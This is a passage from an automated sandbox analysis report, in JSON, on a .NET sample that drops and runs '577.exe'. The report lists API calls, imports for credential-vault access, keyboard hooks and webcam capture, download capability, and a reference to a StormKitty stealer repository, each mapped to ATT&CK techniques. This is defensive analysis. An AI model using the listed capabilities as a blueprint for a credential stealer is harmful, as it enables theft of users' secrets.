parameter InitOnceExecuteOnce (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter AddDllDirectory (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCallback (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCleanupCallback (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter SetShellShimInstance (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter OnShimDllMainCalled (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter _CorExeMain_RetAddr (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter _CorExeMain (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter UrlIsW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter VerQueryValueW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter SetRuntimeInfo (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetProcessWindowStation (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetUserObjectInformationW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream_RetAddr (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetNumaHighestNodeNumber (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetSystemWindowsDirectoryW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter InitializeAcl (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter AddAccessAllowedAce (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter AddSIDToBoundaryDescriptor (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CreateBoundaryDescriptorW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CreatePrivateNamespaceW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter OpenPrivateNamespaceW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter DeleteBoundaryDescriptor (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter WerRegisterRuntimeExceptionModule (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter RaiseException (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter SetSystemFileCacheSize (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter NtSetSystemInformation (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter PrivIsDllSynchronizationHeld (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetProcessMemoryInfo (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetEnabledXStateFeatures (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter sxsJitStartup (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter jitStartup (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter getJit (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter LocaleNameToLCID (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetUserDefaultLocaleName (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter LCIDToLocaleName (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetUserPreferredUILanguages (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CompareStringOrdinal (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetFullPathName (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetFullPathNameW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyEx (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter OpenProcessTokenW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter SortGetHandle (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter SortCloseHandle (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter NtQuerySystemInformation (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesEx (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter SetThreadErrorMode (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CreateFile (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetFileType (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap_RetAddr (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter BCryptGetFipsAlgorithmMode (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CryptGetDefaultProviderW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CryptGenRandom (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CreateEvent (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CreateEventW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter RegQueryValueEx (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessId (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessIdW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter LookupPrivilegeValue (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter LookupPrivilegeValueW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivileges (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivilegesW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter OpenProcess (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter OpenProcessW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter EnumProcessModules (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter EnumProcessModulesW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetModuleInformation (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetModuleInformationW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetModuleBaseName (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetModuleBaseNameW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameEx (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameExW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CryptCreateHash (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CryptHashData (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CryptGetHashParam (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CryptDestroyHash (UID: 00000000-00005100)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"0d000e002203a46c@ADVAPI32.dll\"\n \"0d000e00fe02a46c@ADVAPI32.dll\"\n \"0b000c00cc02a46c@ADVAPI32.dll\"\n \"10001100da02a46c@ADVAPI32.dll\"\n \"15001600c03e0b6b@ADVAPI32.dll\"\n \"0e000f00703f0b6b@ADVAPI32.dll\"\n \"0e000f00cc3f0b6b@ADVAPI32.dll\"\n \"11001200b4470b6b@ADVAPI32.dll\"\n \"1100120048480b6b@ADVAPI32.dll\"\n \"120013008c480b6b@ADVAPI32.dll\"\n \"12001300e4480b6b@ADVAPI32.dll\"\n \"14001500386e0b6b@ADVAPI32.dll\"\n \"14001500506e0b6b@ADVAPI32.dll\"\n \"14001500686e0b6b@ADVAPI32.dll\"\n \"17001800806e0b6b@ADVAPI32.dll\"\n \"0d000e00986e0b6b@ADVAPI32.dll\"\n \"11001200a86e0b6b@ADVAPI32.dll\"\n \"11001200bc6e0b6b@ADVAPI32.dll\"\n \"0f001000fc6f0b6b@ADVAPI32.dll\"\n \"140015003c700b6b@ADVAPI32.dll\"\n \"1400150054700b6b@ADVAPI32.dll\"\n \"0c000d009c700b6b@ADVAPI32.dll\"\n \"0c000d00ac700b6b@ADVAPI32.dll\"\n \"0e000f00bc700b6b@ADVAPI32.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00001916)\n \"577.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00005100)\n \"577.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00005100)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"CreateProcessW\" with parameter \"%TEMP%\\577.exe\" - (UID: 00000000-00001916)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07\" has an executable section named \".text\"\n \"577.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-155", "relevance": 1, "name": "Contains ability to set file attributes (Dotnet)", "description": "Observed Namespace \"System.IO.File\" and MemberReference \"SetCreationTime\" in \"577.exe\"\n Observed Namespace \"System.IO.File\" and MemberReference \"SetLastWriteTime\" in \"577.exe\"\n Observed Namespace \"System.IO.File\" and MemberReference \"SetLastAccessTime\" in \"577.exe\"\n Observed Namespace \"System.IO.FileSystemInfo\" and MemberReference \"get_Attributes\" in \"577.exe\"\n Observed Namespace \"System.IO.FileSystemInfo\" and MemberReference \"set_Attributes\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-101", "relevance": 1, "name": "Found Native API in Dotnet file", "description": "Observed unmanaged function \"SendARP\" in \"577.exe\"\n Observed unmanaged function \"capCreateCaptureWindowA\" in \"577.exe\"\n Observed unmanaged function \"SendMessage\" in \"577.exe\"\n Observed unmanaged function \"VaultOpenVault\" in \"577.exe\"\n Observed unmanaged function \"VaultCloseVault\" in \"577.exe\"\n Observed unmanaged function \"VaultFree\" in \"577.exe\"\n Observed unmanaged function \"VaultEnumerateVaults\" in \"577.exe\"\n Observed unmanaged function \"VaultEnumerateItems\" in \"577.exe\"\n Observed unmanaged function \"VaultGetItem\" in \"577.exe\"\n Observed unmanaged function \"BCryptOpenAlgorithmProvider\" in \"577.exe\"\n Observed unmanaged function \"BCryptCloseAlgorithmProvider\" in \"577.exe\"\n Observed unmanaged function \"BCryptGetProperty\" in \"577.exe\"\n Observed unmanaged function \"BCryptSetProperty\" in \"577.exe\"\n Observed unmanaged function \"BCryptImportKey\" in \"577.exe\"\n Observed unmanaged function \"BCryptDestroyKey\" in \"577.exe\"\n Observed unmanaged function \"BCryptEncrypt\" in \"577.exe\"\n Observed unmanaged function \"BCryptDecrypt\" in \"577.exe\"\n Observed unmanaged function \"CryptUnprotectData\" in \"577.exe\"\n Observed unmanaged function \"GetForegroundWindow\" in \"577.exe\"\n Observed unmanaged function \"GetWindowThreadProcessId\" in \"577.exe\"\n Observed unmanaged function \"SetWindowsHookEx\" in \"577.exe\"\n Observed unmanaged function \"UnhookWindowsHookEx\" in \"577.exe\"\n Observed unmanaged function \"CallNextHookEx\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-135", "type": 2, "relevance": 1, "name": "Found well known domains (string)", "description": "\"mhttps://github.com/LimerBoy/StormKitty\" (Indicator: \"github.com\")", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\577.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-3", "type": 10, "name": "Loads the .NET runtime environment", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\9f895c66454577eff9c77442d0c84f71\\mscorlib.ni.dll\" at 64380000\n \"577.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 62010000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\CLR_PerfMon_WrapMutex\"\n \"Global\\CLR_PerfMon_WrapMutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"577.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74E00000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"577.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07\" file has an entrypoint instructions - \"jmp\tdword ptr [0x402000],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"\n \"577.exe\" file has an entrypoint instructions - \"jmp\tdword ptr [0x402000],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-144", "relevance": 1, "name": "PE file contains COM data directory", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"\n \"577.exe\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-138", "relevance": 1, "name": "Dotnet code contains ability to query registry", "description": "Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"OpenSubKey\" in \"577.exe\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"GetValue\" in \"577.exe\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"OpenBaseKey\" in \"577.exe\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"GetSubKeyNames\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-99", "relevance": 1, "name": "Contains ability to download files with network (Dotnet)", "description": "Observed Namespace \"System.Net.WebClient\" and MemberReference \"DownloadString\" in \"577.exe\"\n Observed Namespace \"System.Net.WebClient\" and MemberReference \"DownloadFile\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-108", "relevance": 1, "name": "Contains ability to execute application (Dotnet)", "description": "Observed function \"set_UseShellExecute\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-111", "relevance": 1, "name": "Contains ability to start a process (Dotnet)", "description": "Observed function \"Process.set_StartInfo\" in \"577.exe\"\n Observed function \"Process.Start\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-126", "relevance": 1, "name": "Dotnet source code contains suspicious native API", "description": "Observed API \"MapVirtualKey\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-354", "type": 2, "relevance": 1, "name": "Contains reference to mutex-related activity (API string)", "description": "Found reference to API \"CreateMutex\" (Indicator: \"CreateMutex\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"CreateMutex\" (Indicator: \"CreateMutex\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"CreateMutex\" (Indicator: \"CreateMutex\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"577.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"577.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%TEMP%\\577.exe]- [targetUID: 00000000-00001916]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07\" was detected as \"Microsoft visual C# v7.0 / Basic .NET\"\n \"577.exe\" was detected as \"Microsoft visual C# v7.0 / Basic .NET\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", 